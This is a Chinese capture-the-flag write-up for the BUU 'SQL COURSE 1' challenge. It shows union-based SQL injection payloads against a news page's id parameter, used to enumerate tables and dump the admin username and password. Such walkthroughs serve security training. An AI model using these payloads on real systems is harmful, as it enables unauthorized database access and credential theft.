BUU SQL COURSE 1 sql注入

这里分析,存在两个分析点

登录界面和新闻界面

这里可以先试一下登陆界面是否存在sql注入,但是经过测试不存在,可以通过通用的sql注入语句测试,从而分析到主要点不在登录,那就可能是新闻页面的,我们在点击新闻的时候,这里后面的代码处理是直接在数据库中进行搜索呈现,可以看到存在?id的形式

这里是直接拼接id,有回显,通过sql语句进行拼接id,因此这里就可以构造payload,通过访问地址进行查询他的数据库信息,因此就可以进行接下来的操作

探测数据表的列数

复制代码
?id=1 order by 2

存在两列

复制代码
?id=1 order by 3

不存在三列

查询数据库核心信息

复制代码
?id=-1 union select database(),2 

查看数据库信息

数据库信息为news

查询数据库里的所有表名

复制代码
?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

存在两个数据表,包含admin和contents

进行查询admin的属性后查询属性值

复制代码
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

查询账号密码

复制代码
?id=-1 union select username,password from admin

得到admin账号密码

最后登录获得flag

相关推荐
阿拉斯攀登12 小时前
向量数据库选型:Milvus vs Chroma vs Elasticsearch
数据库·elasticsearch·milvus·知识库·rag·个人知识库
彦为君12 小时前
Redis最新版本特性
java·数据库·redis·算法·bootstrap
菩提小狗13 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
vigor51213 小时前
MySQL通过Mango实现分库分表
android·数据库·mysql
weixin1997010801613 小时前
[特殊字符]《京东订单API(jd.order.detail.get)对接ERP:企业认证+OAuth授权避坑指南》(附Python源码)
java·数据库·python
赵渝强老师13 小时前
【赵渝强老师】高斯数据库(openGauss)的模式
数据库·opengauss·国产数据库·高斯数据库
长不胖的路人甲13 小时前
Redis 数据删除策略
数据库·redis·spring
ClouGence13 小时前
SQL Server CDC 如何降低主库压力?Always On 备库读取实践
数据库·后端·sql·sqlserver
Rocket-Luo14 小时前
谈谈企业中的网络安全
网络·安全·web安全
尽兴-14 小时前
Redis 为什么快?
数据库·redis·内存